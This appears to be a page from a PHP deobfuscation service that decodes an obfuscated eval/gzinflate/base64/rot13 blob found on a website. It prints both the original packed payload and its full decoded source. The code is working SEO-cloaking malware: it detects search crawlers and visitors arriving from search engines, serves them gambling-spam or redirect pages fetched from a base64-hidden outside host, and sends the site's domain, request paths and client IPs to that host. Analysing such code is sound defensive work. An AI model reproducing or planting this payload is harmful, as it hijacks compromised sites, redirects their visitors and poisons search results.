Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode(str_rot13('gEueH+YV9eC+vbkSzINQwb9ke4/vGvRRMQLPT0Pimc1X..

Decoded Output download

set_time_limit(0);
error_reporting(0);

define('VERSION', 'PSUFW');
define('APIVERSION', 'gnCraroM');
define('API', base64_decode('aHR0cHM6Ly9naWFvdGllcDM2NS5jb20v'));
define('API_HTTP', base64_decode('aHR0cDovL2dpYW90aWVwMzY1LmNvbS8='));
define('API2', '');
define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2dpYW90aWVwMzY1LmNvbS9yLzEuaHRtbCI7PC9zY3JpcHQ+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8aDE+Tm90IEZvdW5kPC9oMT4KICAgIDwvYm9keT4KPC9odG1sPgo='));

$req_ref = $_SERVER["HTTP_REFERER"];
$req_ua = $_SERVER["HTTP_USER_AGENT"];
$host = $_SERVER['HTTP_HOST'];
$req_uri = $_SERVER['REQUEST_URI'];

function fetch_prefix() {

}

function insert_html() {
	ob_start();
	register_shutdown_function('insert_html_end');
}

function insert_html_end() {
    $output = ob_get_contents();
    ob_end_clean();
}

function is_prefix($uri, $prefix_regex='/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|zop|xsn|xiazai|vna|soft|rna|qsj|muv|iphone|gov|edu|apk|wp-news|uri|bak|start|gaming|sport|football|bull)./') {
	return preg_match($prefix_regex, $uri) === 1;
}

function is_crawler($ua) {
    $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
	foreach ($crawlers as $c) {
		if (stripos($ua, $c) !== false) {
			return true;
		}
	}
	return false;
}

function is_visitor($ref) {
	if (substr($ref, 0, 4) === 'http') {
        $refs = array('google.', 'bing.', 'yahoo.');
		foreach ($refs as $r) {
			if (stripos($ref, $r) !== false) {
				return true;
			}
		}
	}
	return false;
}

function get_content($url, $headers=array(), $conn_timeout=0, $trans_timeout=0) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
		curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
		curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $result = curl_exec($ch);
		if(curl_errno($ch)){
			$result = NULL;
		}
        curl_close($ch);
        return $result;
    }
	else {
        return file_get_contents($url);
    }
}
function get_client_ip(){
    foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key){
        if (array_key_exists($key, $_SERVER) === true){
            foreach (explode(',', $_SERVER[$key]) as $ip){
                $ip = trim($ip);
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false){
                    return $ip;
                }
            }
        }
    }
}

function main() {
	global $req_ref, $req_ua, $host, $req_uri;
	header('Cache-Control: no-store, no-cache, must-revalidate');
	header('Cache-Control: post-check=0, pre-check=0', FALSE);
	header('Pragma: no-cache');
	$uri_encoded = urlencode($req_uri);
	$headers = array();
	if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
		$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
		array_push($headers, "Accept-Language: $lang");
		array_push($headers, "Vary: Accept-Language");
	}
	if (is_crawler($req_ua)) {
		$crawler_ip = get_client_ip();
		if (is_prefix($req_uri)) {
			header('Content-Type:text/html; charset=utf-8');
			echo get_content(API_HTTP. "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers);
			exit;
		}
		else {
			echo get_content(API_HTTP. "friends.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION);
		}
	}
	elseif (is_prefix($req_uri) && is_visitor($req_ref)) {
		header('Content-Type:text/html; charset=utf-8');
		$client_ip = get_client_ip();
		$allheaders = array();
		if (!function_exists('getallheaders')) {
			function getallheaders() {
			$tmp_headers = array();
			foreach ($_SERVER as $name => $value) {
				if (substr($name, 0, 5) == 'HTTP_') {
					$tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
				}
			}
			return $tmp_headers;
			}
			$allheaders = getallheaders();
		}
		else {
			$allheaders = getallheaders();
		}
		foreach ($allheaders as $key => $value) {
			if (stripos($key, 'Sec-') === 0) {
				array_push($headers, "$key: $value");
			}
		}

		$html = get_content(API_HTTP. "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3);
		echo ($html? $html: FALLBACK_REDIRECT_HTML);
		exit;
	}
}

main();

Did this file decode correctly?

Original Code

<?php eval(gzinflate(base64_decode(str_rot13('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'))));?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 9b887d3e71d35e54529cc986804fe5f4
Eval Count 1
Decode Time 68 ms